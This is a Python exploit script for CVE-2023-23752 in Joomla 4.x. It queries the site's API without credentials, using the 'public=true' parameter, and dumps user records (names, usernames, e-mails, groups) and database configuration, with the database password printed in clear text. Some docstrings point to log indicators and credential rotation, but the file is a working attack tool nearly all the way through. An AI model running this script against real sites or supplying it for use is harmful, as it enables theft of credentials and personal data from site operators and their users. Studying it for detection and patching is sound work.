"""
Joomla Unauthenticated Information Disclosure
CVE-2023-23752
Affected versions: 4.0.0 up to, but not including, 4.2.8
Github:
https://github.com/AlissonFaoli
Linkedin:
https://linkedin.com/alisson-faoli
"""
#!/usr/bin/python3
import json
import requests
import sys
# Usage text for the command line. The entry point prints it for an
# unrecognised option and also from its catch-all exception handler, so seeing
# it does not by itself mean the arguments were wrong.
HELP = (
    '\n'
    'Usage:\n'
    f'python3 {__file__} [option] URL\n'
    'Example:\n'
    f'python3 {__file__} -a http://example.com\n'
    'Options:\n'
    '-u dump users\n'
    '-U dump users in full JSON format\n'
    '-c dump configs\n'
    '-C dump configs in full JSON format\n'
    '-a dump users and configs\n'
    '-A dump users and configs in full JSON format\n'
)
def get_users():
    """Request the user listing from the site's API and return the parsed JSON.

    Sends a GET without credentials to ``/api/index.php/v1/users?public=true``
    under the module-level ``url`` (assigned in the ``__main__`` block). This is
    one of the two requests this script makes for the CVE named in the module
    header; the same path and ``public=true`` query string are what to search
    for in web-server access logs when checking whether a site was probed.

    Returns:
        The decoded JSON body. The HTTP status is not inspected, so an error
        document is returned to the caller like any other response.
    """
    endpoint = '/api/index.php/v1/users?public=true'
    # NOTE(review): no timeout is passed, so an unresponsive server can block
    # this call indefinitely.
    response = requests.get(url + endpoint)
    return response.json()
def get_configs():
    """Request the application configuration from the site's API as parsed JSON.

    Sends a GET without credentials to
    ``/api/index.php/v1/config/application?public=true`` under the module-level
    ``url`` (assigned in the ``__main__`` block). Access-log entries for this
    path combined with ``public=true`` are the indicator to look for when
    reviewing whether configuration data was requested from a site.

    Returns:
        The decoded JSON body. The HTTP status is not inspected, so an error
        document is returned to the caller like any other response.
    """
    endpoint = '/api/index.php/v1/config/application?public=true'
    # NOTE(review): no timeout is passed, so an unresponsive server can block
    # this call indefinitely.
    response = requests.get(url + endpoint)
    return response.json()
def pretty_json(json_data):
    """Serialise *json_data* as indented JSON text.

    Nesting is indented by four spaces; items are separated by ``,`` and keys
    from values by ``:`` with no padding after either.
    """
    layout = {'indent': 4, 'separators': (',', ':')}
    return json.dumps(json_data, **layout)
def userinfo(info):
    """Format the user records of an API response as plain text.

    Args:
        info: Parsed response; each item of its ``data`` list is read for an
            ``attributes`` mapping.

    Returns:
        One seven-line block per user (name, id, username, e-mail, register
        date, group names, send-e-mail flag), blocks joined by a newline.
        Missing attributes are rendered as ``None``.

    The output holds personal data (names, usernames, e-mail addresses) and
    should be stored and shared accordingly.
    """
    # NOTE(review): a response without a ``data`` list makes this loop raise
    # TypeError; nothing here checks for an error document.
    blocks = []
    for entry in info.get('data'):
        attrs = entry.get('attributes')
        can_mail = 'Yes' if attrs.get('sendEmail') else 'No'
        fields = (
            f'Name: {attrs.get("name")}',
            f'ID: {attrs.get("id")}',
            f'Username: {attrs.get("username")}',
            f'Email: {attrs.get("email")}',
            f'Register date: {attrs.get("registerDate")}',
            f'Group name: {attrs.get("group_names")}',
            f'Able to send e-mail: {can_mail}',
        )
        blocks.append('\n'.join(fields))
    return '\n'.join(blocks)
def configsinfo(info):
    """Summarise the database-related settings of a configuration response.

    Args:
        info: Parsed response; items of its ``data`` list whose ``type`` is
            ``'application'`` are read for an ``attributes`` mapping.

    Returns:
        One ``Label: value`` line per recognised setting, each ending in a
        newline. Only the first key of each ``attributes`` mapping is looked
        at; entries whose first key is not listed below are skipped.

    The ``Password`` line is printed in clear text and is presumably the
    site's database credential, so the output is secret material. If a site
    returned it to an unauthenticated request, that credential should be
    rotated in addition to upgrading.
    """
    labels = {
        'db': 'Database',
        'dbtype': 'Database type',
        'dbprefix': 'Database prefix',
        'host': 'Host',
        'user': 'User',
        'password': 'Password',
        'dbencryption': 'Encryption',
    }
    settings = [
        entry.get("attributes")
        for entry in info.get('data')
        if entry.get('type') == 'application'
    ]
    lines = []
    for attrs in settings:
        # Each entry is identified by its first key only.
        first_key = list(attrs.keys())[0]
        if first_key in labels:
            lines.append(f'{labels[first_key]}: {attrs.get(first_key)}\n')
    return ''.join(lines)
if __name__ == '__main__':
    # Command-line entry point: the first argument selects the report, the last
    # argument is the site address. ``url`` is deliberately a module global,
    # because get_users() and get_configs() read it.
    try:
        selection = sys.argv[1]
        url = sys.argv[-1]
        # Drop a single trailing slash so the API path can be appended as-is.
        if url[-1] == '/':
            url = url[:-1]
        # Anything not starting with "http" gets a plain-HTTP scheme prepended.
        if not url.startswith('http'):
            url = 'http://' + url

        if selection == '-u':
            print(userinfo(get_users()))
        elif selection == '-U':
            print(pretty_json(get_users()))
        elif selection == '-c':
            print(configsinfo(get_configs()))
        elif selection == '-C':
            print(pretty_json(get_configs()))
        elif selection == '-a':
            # Both requests complete before anything is printed.
            users = userinfo(get_users())
            configs = configsinfo(get_configs())
            print('\n[USERS]')
            print(users)
            print('\n[CONFIGS]')
            print(configs)
        elif selection == '-A':
            print(pretty_json({'users': get_users(), 'configs': get_configs()}))
        else:
            print(HELP)
    # NOTE(review): the bare except also catches connection failures, non-JSON
    # bodies, responses without a ``data`` list and KeyboardInterrupt, and
    # reports all of them as the usage text.
    except:
        print(HELP)